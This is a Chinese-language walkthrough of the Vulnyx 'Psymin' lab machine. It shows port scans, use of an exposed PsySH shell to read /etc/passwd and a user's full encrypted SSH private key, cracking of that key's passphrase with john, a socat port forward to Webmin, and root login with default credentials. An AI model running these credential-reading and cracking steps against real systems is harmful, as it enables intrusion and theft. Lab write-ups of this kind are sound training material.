Vulnyx-Psymin靶机详解WP

信息收集

服务探测

开了三个端口

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.133  08:00:27:da:4f:f5       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.994 seconds (128.39 hosts/sec). 4 responded
❯ ip=192.168.60.133
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.133:22
Open 192.168.60.133:80
Open 192.168.60.133:3000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 20:40 CST
Initiating ARP Ping Scan at 20:40
Scanning 192.168.60.133 [1 port]
Completed ARP Ping Scan at 20:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:40
Completed Parallel DNS resolution of 1 host. at 20:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:40
Scanning 192.168.60.133 [3 ports]
Discovered open port 80/tcp on 192.168.60.133
Discovered open port 3000/tcp on 192.168.60.133
Discovered open port 22/tcp on 192.168.60.133
Completed SYN Stealth Scan at 20:40, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.133
Host is up, received arp-response (0.0017s latency).
Scanned at 2025-01-03 20:40:10 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3000/tcp open  ppp     syn-ack ttl 64
MAC Address: 08:00:27:DA:4F:F5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

我首先看了80端口，就是个nginx的默认首页

❯ curl $ip
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

扫一下目录吧，看看有没有什么信息，medium字典扫不出来

我猜测大概率在3000端口上找关键

我利用nmap再次扫描一下UDP服务

发现开放了一个10000端口有个webmin服务

❯ nmap -sU -sV --version-intensity 0 -n -F -T4 192.168.60.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 20:47 CST
Nmap scan report for 192.168.60.133
Host is up (0.00054s latency).
Not shown: 58 open|filtered udp ports (no-response), 41 closed udp ports (port-unreach)
PORT      STATE SERVICE VERSION
10000/udp open  webmin  (http on TCP port 10000)
MAC Address: 08:00:27:DA:4F:F5 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.38 seconds

Webmin 是一个基于 Web 的系统管理工具，用于简化 Unix-like 操作系统（如 Linux 和 BSD）上的系统管理任务。通过 Webmin，你可以在浏览器中远程管理和配置服务器，而不需要使用命令行。它为系统管理员提供了一个集中的界面来处理大多数系统管理任务，如用户管理、服务配置、磁盘管理、网络设置等。

这个10000端口开放是可以使其他其他 Webmin 服务器找到这台服务器

Psysh文件读取

但发现3000端口可以通过nc连上一个psysh的东西

通过官方文档查看命令，可以进行执行echo命令

Commands · bobthecow/psysh Wiki

尝试读取文件

❯ nc 192.168.60.133 3000
Psy Shell v0.12.4 (PHP 8.2.20 — cli) by Justin Hileman
New version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
> echo file_get_contents('/etc/passwd')
echo file_get_contents('/etc/passwd')
WARNING: terminal is not fully functional
Press RETURN to continue

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
alfred:x:1000:1000:alfred:/home/alfred:/bin/bash
>

PsySH 是一个用 PHP 编写的命令行交互式 shell，类似于 Python 的 python 命令或 Ruby 的 irb，它允许开发者在命令行中即时执行 PHP 代码、调试脚本、探索 PHP 类和函数等。

用户提权

发现有个用户alfred试试能不能读取ssh私钥

>  echo file_get_contents('/home/alfred/.ssh/id_rsa')
 echo file_get_contents('/home/alfred/.ssh/id_rsa')
WARNING: terminal is not fully functional
Press RETURN to continue

-----BEGIN OPENSSH PRIVATE KEY-----
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
mqXDfQ==
-----END OPENSSH PRIVATE KEY-----

尝试利用公钥连接一下

发现公钥加密了，没有其他信息了，只能爆破看一下了

拿到密码了alfredo

❯ vim id_rsa
❯ ssh [email protected] -i id_rsa
The authenticity of host '192.168.60.133 (192.168.60.133)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.133' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
[email protected]: Permission denied (publickey).
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alfredo          (id_rsa)
1g 0:00:05:29 DONE 2/3 (2025-01-03 21:52) 0.003037g/s 43.93p/s 43.93c/s 43.93C/s rosita..0987654321
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

连上看一下，拿到user

❯ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
alfred@psymin:~$ ls
psysh  user.txt
alfred@psymin:~$ cat user.txt
e12853c615d191efce15c726a0684754

端口转发

再次信息收集

发现10000端口只开放了udp没有开放tcp

正好靶机自带socat，端口转发一下

alfred@psymin:~$ socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:10000 &
[1] 1850
alfred@psymin:~$ ss -lnutp
Netid       State        Recv-Q       Send-Q             Local Address:Port              Peer Address:Port      Process
udp         UNCONN       0            0                        0.0.0.0:10000                  0.0.0.0:*
udp         UNCONN       0            0                        0.0.0.0:68                     0.0.0.0:*
tcp         LISTEN       0            4096                   127.0.0.1:10000                  0.0.0.0:*
tcp         LISTEN       0            128                      0.0.0.0:22                     0.0.0.0:*
tcp         LISTEN       0            511                      0.0.0.0:80                     0.0.0.0:*
tcp         LISTEN       0            5                        0.0.0.0:3000                   0.0.0.0:*          users:(("socat",pid=322,fd=5))
tcp         LISTEN       0            5                        0.0.0.0:8080                   0.0.0.0:*          users:(("socat",pid=1850,fd=5))
tcp         LISTEN       0            128                         [::]:22                        [::]:*
tcp         LISTEN       0            511                         [::]:80                        [::]:*
alfred@psymin:~$ 2025/01/03 15:02:36 socat[1904] E write(6, 0x556f5bdc4000, 8192): Broken pipe

Root提权

利用弱密码登入，账户密码都是root

直接读取flag即可8968662c86171f7a5afe387a949fe665

如果还要进一步的可以利用command shell弹个shell